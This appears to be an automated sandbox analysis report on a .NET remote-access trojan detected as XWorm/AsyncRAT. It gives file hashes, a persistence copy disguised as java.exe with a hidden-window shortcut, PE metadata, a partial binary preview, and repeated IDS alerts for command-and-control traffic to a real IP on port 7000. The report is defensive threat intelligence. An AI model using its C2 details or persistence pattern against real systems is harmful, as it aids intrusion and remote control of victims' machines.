                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 13:20:08 2024, mtime=Fri Nov 29 13:20:08 2024, atime=Fri Nov 29 13:20:08 2024, length=89088, window=hide
                                                                                Category:dropped
                                                                                Size (bytes):750
                                                                                Entropy (8bit):5.050525353550501
                                                                                Encrypted:false
                                                                                SSDEEP:12:8iKlEO4AY0pnu8ChC4Tl8lXIsY//KCP3wJLd1A586EAjAsKllE+H8BUh+VpMV9mV:8i+mALD2l8lXUmFd1Z6bAsK/ENsA89m
                                                                                MD5:60671F02C3DDDF0BCE82CEEA7E672F9A
                                                                                SHA1:AF1ABABDF369A0C36879A04AC997C8EBA6B8B9DA
                                                                                SHA-256:1697488D5D15F6CB500474D006864B991A882F4EC4066F8091CDADA41616C056
                                                                                SHA-512:A275469EEBB1E7AEA3C621A48141104EE7FDDDF5DF33E51AF0CB4220778FCDAAEE73ABB7192AA5784532EFBE2E47EA38EBFB262E578C7541B51D27F6771EF9B2
                                                                                Malicious:false
                                                                                Preview:L..................F.... ...(...iB..(...iB..(...iB...\......................n.:..DG..Yr?.D..U..k0.&...&.......$..S...\..iB......iB......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2}Y]r...........................^.A.p.p.D.a.t.a...B.V.1.....}Y[r..Roaming.@......EW<2}Y[r..../.....................W...R.o.a.m.i.n.g.....Z.2..\..}Y.r .java.exe..B......}Y.r}Y.r............................0.j.a.v.a...e.x.e.......Y...............-.......X............_.......C:\Users\user\AppData\Roaming\java.exe........\.....\.....\.....\.....\.j.a.v.a...e.x.e.`.......X.......045012...........hT..CrF.f4... .|...]....-...-$..hT..CrF.f4... .|...]....-...-$.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):89088
                                                                                Entropy (8bit):6.687051336040018
                                                                                Encrypted:false
                                                                                SSDEEP:1536:XT1opub0jX2VNjYsBabpfkT8Kjht6CvOjTd2ogBTR7IPxgW4hYxxBlzo:D1Auoj6dBwbpfkTttvOjYogBiPxJ4hc4
                                                                                MD5:4347FB3A5B1EABF2E594A895A30B98F4
                                                                                SHA1:36993DF090A7F68C57F96FFE5724674520998AC8
                                                                                SHA-256:492A7DE87F0FF73DA5B30A460CE1FBE03A0D7EDF0634906F6A67D711B4A46751
                                                                                SHA-512:7157339421E0E51B3F3FA2659C273B428D2E63207977C5F4145FBAABB9BA866D60F8DF290E29DC5D203D241497D1891EE7302A83F5C069D5BA29928736416E01
                                                                                Malicious:true
                                                                                Yara Hits:
                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\java.exe, Author: Joe Security
                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\java.exe, Author: ditekSHen
                                                                                Antivirus:
                                                                                • Antivirus: Avira, Detection: 100%
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 82%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C;g.....................L.......,... ...@....@.. ....................................@.................................d,..W....@...I........................................................................... ............... ..H............text........ ...................... ..`.rsrc....I...@...J..................@..@.reloc...............Z..............@..B.................,......H........n..|.......&.....................................................(....*.r...p*. .W..*..(....*.r...p*. ...*.s.........s.........s.........s.........*.r5..p*. ....*.rO..p*. ....*.ri..p*. ..e.*.r...p*. .z..*.r...p*. .5..*..((...*.r...p*. S...*.r...p*. P4..*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&('...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. j...*.r...p*. ..p.*.r...p*. ..W.*.r...p*. ....*.r1..p*. .\=.*.rK..p*. .x!.*.re.
                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                File Type:JSON data
                                                                                Category:dropped
                                                                                Size (bytes):55
                                                                                Entropy (8bit):4.306461250274409
                                                                                Encrypted:false
                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                Malicious:false
                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):6.687051336040018
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:file.exe
                                                                                File size:89'088 bytes
                                                                                MD5:4347fb3a5b1eabf2e594a895a30b98f4
                                                                                SHA1:36993df090a7f68c57f96ffe5724674520998ac8
                                                                                SHA256:492a7de87f0ff73da5b30a460ce1fbe03a0d7edf0634906f6a67d711b4a46751
                                                                                SHA512:7157339421e0e51b3f3fa2659c273b428d2e63207977c5f4145fbaabb9ba866d60f8df290e29dc5d203d241497d1891ee7302a83f5c069d5ba29928736416e01
                                                                                SSDEEP:1536:XT1opub0jX2VNjYsBabpfkT8Kjht6CvOjTd2ogBTR7IPxgW4hYxxBlzo:D1Auoj6dBwbpfkTttvOjYogBiPxJ4hc4
                                                                                TLSH:E893AE9CB7D40561D1FF5BB568B23202CA74EA630E03D70F68C951DA6B2B68C8D40BF9
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....C;g.....................L.......,... ...@....@.. ....................................@................................
                                                                                Icon Hash:901c8e4653435b79
                                                                                Entrypoint:0x412cbe
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x673B439B [Mon Nov 18 13:39:39 2024 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x12c640x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x49d2.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x10cc40x10e009a565d2d742f2cbc26acefad1e5a8dfbFalse0.5816116898148148data6.154683890959466IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x140000x49d20x4a00c0d2a6732f0434ac63b5df3a6e7b062fFalse0.9642630912162162data7.883693475319175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1a0000xc0x200a5923cbf3cc95dc01c44e397433c2633False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_ICON0x141300x4466PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced1.000913763563678
                                                                                RT_GROUP_ICON0x185980x14data0.9
                                                                                RT_VERSION0x185ac0x23cdata0.4737762237762238
                                                                                RT_MANIFEST0x187e80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain
                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-29T15:20:23.932978+01002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:24.666364+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:24.694814+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:28.810945+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:28.810945+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:35.564791+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:35.567275+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:46.628008+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:46.631035+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:57.689916+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:57.691756+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:58.593385+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.649884103.230.121.1247000TCP
                                                                                2024-11-29T15:20:58.893906+01002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:58.893906+01002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:59.340612+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1103.230.121.1247000192.168.2.649884TCP
                                                                                2024-11-29T15:20:59.822140+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:20:59.822140+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:20:59.943490+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:20:59.943490+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.064973+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.064973+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.184921+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.184921+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.306110+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.306110+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.426980+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.426980+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.547220+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.547220+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.787599+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.787599+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.907672+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:00.907672+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.027780+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.027780+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.147964+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.147964+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.268067+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.268067+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.390386+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.390386+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.512111+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.512111+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.724011+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.724011+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.923266+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:01.923266+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.125543+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.125543+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.246667+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.246667+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.366715+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.366715+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.608571+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.608571+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.728572+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.728572+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.848703+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:02.848703+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.088530+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.088530+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.208751+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.208751+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.329282+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.329282+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.449996+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.449996+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.573360+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.573360+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.814592+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.814592+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.920478+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:03.920478+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.040774+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.040774+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.162284+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.162284+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.290201+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.290201+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.426020+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.426020+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.596157+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.596157+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.720026+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:04.720026+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.030145+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.030145+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.150189+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.150189+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.270211+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.270211+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.649986103.230.121.1247000TCP
                                                                                2024-11-29T15:21:05.372291+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.649986103.230.121.1247000TCP
